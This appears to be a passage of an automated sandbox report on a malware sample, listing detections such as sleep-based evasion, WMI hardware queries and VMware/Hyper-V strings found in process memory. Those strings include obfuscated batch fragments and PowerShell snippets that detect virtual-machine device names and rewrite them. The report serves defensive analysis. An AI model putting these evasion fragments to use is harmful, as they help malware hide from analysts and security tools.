        Source: C:\Windows\System32\svchost.exe TID: 2216Thread sleep time: -97000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 2112Thread sleep count: 1223 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 2112Thread sleep time: -61150s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1968Thread sleep count: 48 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1968Thread sleep time: -48000s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1724Thread sleep count: 1229 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 1724Thread sleep time: -61450s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3620Thread sleep count: 1234 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3620Thread sleep time: -61700s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3176Thread sleep count: 1255 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3176Thread sleep time: -62750s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 4616Thread sleep count: 1176 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 4616Thread sleep time: -58800s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 2980Thread sleep count: 1214 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 2980Thread sleep time: -60700s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3340Thread sleep count: 1128 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3340Thread sleep time: -56400s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 5848Thread sleep count: 1112 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 5848Thread sleep time: -55600s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 2188Thread sleep count: 1109 > 30Jump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 2188Thread sleep time: -55450s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 3192Thread sleep count: 933 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3192Thread sleep time: -46650s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3284Thread sleep count: 1005 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3284Thread sleep time: -50250s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3616Thread sleep count: 1173 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3616Thread sleep time: -58650s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1420Thread sleep count: 1144 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1420Thread sleep time: -57200s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 2876Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3828Thread sleep count: 1188 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3828Thread sleep time: -59400s >= -30000s
        Source: C:\Windows\System32\spoolsv.exe TID: 2072Thread sleep count: 1181 > 30
        Source: C:\Windows\System32\spoolsv.exe TID: 2072Thread sleep time: -59050s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\more.comLast function: Thread delayed
        Source: C:\Windows\System32\more.comLast function: Thread delayed
        Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
        Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
        Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BEF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_000001B780BEF3E8
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BEF264 FindFirstFileExW,4_2_000001B780BEF264
        Source: C:\Windows\System32\conhost.exeCode function: 5_2_000002640732F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_000002640732F3E8
        Source: C:\Windows\System32\conhost.exeCode function: 5_2_000002640732F264 FindFirstFileExW,5_2_000002640732F264
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE52F264 FindFirstFileExW,16_2_00000234FE52F264
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE52F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_00000234FE52F3E8
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEEF264 FindFirstFileExW,18_2_000002158AEEF264
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEEF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_000002158AEEF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01AF264 FindFirstFileExW,19_2_000001E8A01AF264
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01AF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_000001E8A01AF3E8
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F08894F264 FindFirstFileExW,20_2_000001F08894F264
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F08894F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000001F08894F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F7F264 FindFirstFileExW,21_2_000001AC86F7F264
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F7F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001AC86F7F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FBF264 FindFirstFileExW,22_2_0000014785FBF264
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FBF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_0000014785FBF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D1F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_000001DC59D1F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D1F264 FindFirstFileExW,23_2_000001DC59D1F264
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BCF264 FindFirstFileExW,24_2_0000016588BCF264
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BCF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_0000016588BCF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D34F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_0000017A8D34F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D34F264 FindFirstFileExW,25_2_0000017A8D34F264
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8BF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000001F34D8BF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8BF264 FindFirstFileExW,26_2_000001F34D8BF264
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C270F264 FindFirstFileExW,27_2_00000220C270F264
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C270F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,27_2_00000220C270F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E9F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_0000025AF1E9F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E9F264 FindFirstFileExW,28_2_0000025AF1E9F264
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD3F264 FindFirstFileExW,29_2_0000027BFFD3F264
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD3F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_0000027BFFD3F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE059F264 FindFirstFileExW,30_2_000001CEE059F264
        Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CEE059F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,30_2_000001CEE059F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B39F264 FindFirstFileExW,31_2_000001B12B39F264
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B39F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_000001B12B39F3E8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 30000
        Source: svchost.exe, 0000001B.00000002.2624107430.00000220C465C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s\GvmciW
        Source: svchost.exe, 0000001B.00000002.2552336547.00000220C2042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1547637322.00000220C2042000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
        Source: svchost.exe, 0000001B.00000000.1547637322.00000220C2042000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
        Source: svchost.exe, 0000001B.00000003.1569383311.00000220C2AFD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
        Source: svchost.exe, 00000018.00000002.2591998833.0000016588DD9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
        Source: svchost.exe, 0000001B.00000000.1547344289.00000220C1FA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec9
        Source: powershell.exe, 0000000C.00000002.1364727100.0000024554943000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207E82000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %VcLdwieunwyzzIoSzRghvRTgVqlnrEonZpKuFNdxayIekoqlofFHQnYdiEigXQdJilAjYTnMOIhWiPWGaaZl% "h%ZdjRgrYGTaiSlXPmnQxefitGUpKvxmaEttEqapXQVcuoprLw%U%HNFbFHKRJDXRGDjGaDySsylXSHjcOerDDoNJHZYLINGxsgjr%J%TNoLSTeiBHiYyHcFlunsPzZbFNjESOFMyRjaPGKJjFhZQana%o%KbmXSQBtOmffKzqNcvAGycPFJEikrZkEAjURBHUHpQlDAFZK%p%ouXvAGCHlGooIrbOcBEBEzluBSrHQmfdExWXcPeTGmFVtGZY%x%OwBYayfPiDUHpUQYBkJkueMmxKUsTqaUTsTuLgdgsgPyVwEL%j%vHtjWPDJKoBpDNVRCZNWawnuhCSopnqagiWmXRYeOkJwENCE%X%kXWWIHLYtYbtWpuwXAjvQJUKbJiQNQQuandrruryxYSYPEhy%t%PmzdDhNBdlUZzUlDiHtJmcfCjLXSRVUxBJbArMQSABofzsYC%x%NoPikymMgWURjVKhqxyPTKmwQAjKOadRNufCgMmcxotvRZIF%a%RgOcTiJcctrJpBXgTdePPibDlvsEqRFRSETIlbXELczNvCNV%S%qnBNUTPJfkQxQeMlNzRKIpVSgAdNIniIHwodpRWYOjCakzNG%R%qnZVKcnarJHuPcaRchPuQIWVDTVyNUHGNxwvonXEjnLFkCiM%d%jKYcJtQHrdsRgOnxcaHsFFDPjklCXqLbLjpcWEXtHPdlVgyu%M%aoDkUPgEhjSyhnKbsrgXzkAxcnLQBsTdMQBIMAgVcKUNMymt%%YQDjkAaEzDhA%j%bSDZAVPNghHdqcPpPLrMboRklUOpNLEbsMzzqemU%"
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207E82000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %GxLrGlaFWAjvZVZOgmuSSThfbUtHBgXRRKCNOSsImhRiYAjTXSTNFtgNpGpLRtdQDrEptlZoULFLbYhBLzKJmjmxDOyhCGQTdbFGWUzMSESTNvLrzOasJuDtfhLENSLnVMHatAEQZX% "N%phRhlfehzzWcwLdeYLbKcpRoQyirexdOHPxbasJoyfLldAN%i%RJMbvcVJZpCqMXMdcviuHncdFbNlWDGlpLqIrwILMgyLxbX%S%rMcJPVfgEHIvtpJNvIrbbGeMGMwIAOqFEevyUUQpjFLaJao%z%vcscdgaWLIqddywFPqcRpTkTBSbRvUdcFxaGhMnzEiKQDQN%V%RMaWJGjZCRzAleiAQEnxFyQxcdDmhjupLekevYtwwyyPImb%u%uwHUlqsisWCTFcWSswkOgTdeRlQbgZbPQbiQzpjYsWRiTfN%D%tzGfsyxVAsCcaArbsVNcEUfsdnlvkcVlMxwBATIqsgHyXmi%n%ybUynfcjzuocfnbKyxrpDdPBzmwKxmHvQeMupDHgJnXhmRD%l%dqviaFXFumtZaIsMmMTmaAHvVPlFpgIpHJttbeGPTyrhWDH%K%xrAKusFCDJanlurpoEesqpYKifdtCizyriNoPwnWchPKbQv%Z%uCidDSlqhtQBppmZujCVcGdARqhpjAoJrJJQtfWGgRGVZUY%C%GQhvBzVtNyIlnKWhHegjFGvFpnVPkaiBXsAybeMkwqVsLTI%k%VkKZQSKtavBgoDgiNqgoUjxgCsWNoKdUvEZEAarJmZzdzYy%C%GqihbFFOMMExyWXeqsHKJDBHNZxbVJuGDTpxfDbpPQnSWDT%N%NpUjKRoOdOBuchEScsXTEGzZNqsUTpJLjfKLbzJOpelIEiZ%Q%hlXkzYKogQUwuztUNfPkWxSRDJjDzuRvEqlJWejMzQDVgdo%a%pWjxCOXdJsgHPPgOLYzSdoKYJVcLgTXKzvTHqWoGGnBqPxu%g%XsbSWGkkamlOGLmXQvvhuVzyOKTlQNtjlBfsebaeokTufhH%e%UuqKVupZbSCdmNZunSbDeGTSOurSkcftGcYRzcxPWCdABYO%F%rpPFBdECoAxVBdwPZNjwjPiUlvmGCCtqQFZDuxDqczJqbgW%%rGlVNZnSp%e%zNeMsCFChVugQYaMhhfVdTuCkSuJfRSeyAgPyGYoaxwycwz%"
        Source: svchost.exe, 0000001B.00000003.1559216705.00000220C2B63000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
        Source: svchost.exe, 0000001B.00000003.1573742854.00000220C4585000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
        Source: svchost.exe, 0000001B.00000002.2542887231.00000220C1FC0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
        Source: svchost.exe, 0000001B.00000003.1559216705.00000220C2B63000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec98
        Source: svchost.exe, 0000001B.00000003.1569383311.00000220C2AFD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
        Source: svchost.exe, 0000001B.00000000.1547745616.00000220C2095000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
        Source: svchost.exe, 0000001B.00000002.2542887231.00000220C1FC0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
        Source: cmd.exe, 00000004.00000003.1268996816.000001B78054B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %GxLrGlaFWAjvZVZOgmuSSThfbUtHBgXRRKCNOSsImhRiYAjTXSTNFtgNpGpLRtdQDrEptlZoULFLbYhBLzKJmjmxDOyhCGQTdbFGWUzMSESTNvLrzOasJuDtfhLENSLnVMHatAEQZX% "N%phRhlfehzzWcwLdeYLbKcpRoQyirexdOHPxbasJoyfLldAN%i%RJMbvcVJZpCqMXMdcviuHncdFbNlWDGlpLqIrwILMgyLxbX%S%rMcJPVfgEHIvtpJNvIrbbGeMGMwIAOqFEevyUUQpjFLaJao%z%vcscdgaWLIqddywFPqcRpTkTBSbRvUdcFxaGhMnzEiKQDQN%V%RMaWJGjZCRzAleiAQEnxFyQxcdDmhjupLekevYtwwyyPImb%u%uwHUlqsisWCTFcWSswkOgTdeRlQbgZbPQbiQzpjYsWRiTfN%D%tzGfsyxVAsCcaArbsVNcEUfsdnlvkcVlMxwBATIqsgHyXmi%n%ybUynfcjzuocfnbKyxrpDdPBzmwKxmHvQeMupDHgJnXhmRD%l%dqviaFXFumtZaIsMmMTmaAHvVPlFpgIpHJttbeGPTyrhWDH%K%xrAKusFCDJanlurpoEesqpYKifdtCizyriNoPwnWchPKbQv%Z%uCidDSlqhtQBppmZujCVcGdARqhpjAoJrJJQtfWGgRGVZUY%C%GQhvBzVtNyIlnKWhHegjFGvFpnVPkaiBXsAybeMkwqVsLTI%k%VkKZQSKtavBgoDgiNqgoUjxgCsWNoKdUvEZEAarJmZzdzYy%C%GqihbFFOMMExyWXeqsHKJDBHNZxbVJuGDTpxfDbpPQnSWDT%N%NpUjKRoOdOBuchEScsXTEGzZNqsUTpJLjfKLbzJOpelIEiZ%Q%hlXkzYKogQUwuztUNfPkWxSRDJjDzuRvEqlJWejMzQDVgdo%a%pWjxCOXdJsgHPPgOLYzSdoKY
        Source: svchost.exe, 0000001B.00000003.1569383311.00000220C2AFD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
        Source: svchost.exe, 0000001B.00000003.1559216705.00000220C2B63000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
        Source: dwm.exe, 00000014.00000000.1510270449.000001F084360000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000<
        Source: dwm.exe, 00000014.00000002.2623511092.000001F084445000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: svchost.exe, 0000001B.00000003.1564036317.00000220C2C03000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
        Source: svchost.exe, 0000001B.00000000.1551921933.00000220C4222000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
        Source: svchost.exe, 0000001B.00000002.2542887231.00000220C1FC0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
        Source: svchost.exe, 0000001B.00000003.1569383311.00000220C2AFD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207E82000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %IrsJhdgIOGykJxlAOiVZaTEYaOLXYjjsLDVcNxEBGjXHwCYChZQIeYQOMuIssjJFwgyfCjNrEttQVXByQiPZtBnNMgqsOljwAslpdSaYmzeLEaSPSkCjtKlVTLtv% "B%FguhFvQjnDPsBhPonnhjemuroFczAenctKdlgLIaafFHXVq%T%UBZLpMpGtLdSZsrJjpMYReEhBFhjZGMutpiXAsXqedKzdSI%n%HJwwrkXzQXSkJEgHMYJzKktiQsvTNteeIXzzDkvjwQsaIio%v%LYwYAutXxpnFZOdLwSNBMfGeBDAcUStAIdJUqvDKpZckpFw%R%useVhUGBGsswXUqdEVMWVfjuaodmMcvOVhfJPWmFcCdBYZG%o%QYWxoDIApjJVSRtPDXDAQOGnHJhUtbHvbInnQFglnGQzfbt%S%OINzEvyQbrIPFwNhnCoTkDgYYQsnjYhhGpsmFCcaDRlWiPB%k%PzyCXRhjkBOANckGdkAjpdBCKznqsskQjpDNLvjpyghKQbo%M%YskiLHFlLYWSxERQSrYryywVIakKjWQLJkoYijyiDdSPODM%n%LHposSJQAVpAKxVcPhlimqSIITQOuGHgfozcTHySZuOcSJN%S%LHbdHDuzvOHFzbVvToiuwXSihJsjSBQPYfegtCaDKOenmbY%c%QdYUOKorNPSVXkkHTYRGtWOcroEJHTEWfKCfTGcfJOrrAHc%r%tAgkpuuETpVDAfFJUkVPmIeOmWMWFFxBKlljAIpCLgIQXdB%o%ZeewhFRPKvsXtHxZoRtToUvilUtegaoQjuNRBiqWSwBOiKW%Z%VnguZDjnfJVlmmMIKhBOYUFxfBxaStHaBYxRaFpnZhIiFXd%D%KgNQHHWXaHJoxgjvMcVJoOVIeRnORlxRhyMUeCZsEawkrqR%T%hQMWfKnPWkfLPtigPjRhZtoqjcCfnrLrNZgXfprhTIPJYQk%y%ZwUHazjSNBvMciiBFzNYPnkazRKnqDFstSDJsJKREhtwKDp%%OuTFiGDgH% %LhkjkSuMlUiiPVCjWctkEyjVPWuHTOqWCKCjtvhBxRyyABbIF%"
        Source: cmd.exe, 00000004.00000003.1305498719.000001B780553000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MoGhzQiYCUFzRcIySWsPaDXmVgGMjcL%v%EpGhqdDIVxQrNPhzvjNuMKNHirumskvPziakkVruonxrj%L%mjxOGkDwHYUBZYZJrpKcbRFOWpARtgznwxWhWxMaStSjg%b%IlWsLWXMpiuEIRqJLcBzGfBbRMUDJkIZvHoeEzHkCAgpB%G%DnFvrgqqKzDJUAYctdfzviaDmflvrWfYmAnyohrdsILiK%%iWWxWHac%a%JZIiixbPfvmcimVUYNtExumANlLbhNxSSSvmMjOIWwu%"
        Source: svchost.exe, 0000001B.00000002.2542887231.00000220C1FC0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
        Source: cmd.exe, 00000004.00000003.1289777984.000001B78052C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.1289657081.000001B78052C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zTCOwOEjxFMJEbQFKATqemUKLcOcbAhSJRrXHEhjJSKt
        Source: svchost.exe, 0000001B.00000000.1548692511.00000220C2A60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmciW
        Source: lsass.exe, 00000012.00000000.1499735658.000002158A08D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
        Source: cmd.exe, 00000004.00000003.1281257025.000001B780553000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rhTIPJYQk%y%ZwUHazjSNBvMciiBFzNYPnkazRKnqDFstSDJsJKREhtwKDp%%OuTFiGDgH% %LhkjkSuMlUiiPVCjWctkEyjVPWuHTOqWCKCjtvhBxRyyABbIF%"
        Source: svchost.exe, 0000001B.00000003.1559216705.00000220C2B63000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
        Source: svchost.exe, 00000013.00000000.1502713594.000001E89FE2A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@H
        Source: svchost.exe, 0000001B.00000003.1563663431.00000220C2BAB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
        Source: svchost.exe, 0000001B.00000003.1569383311.00000220C2AFD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
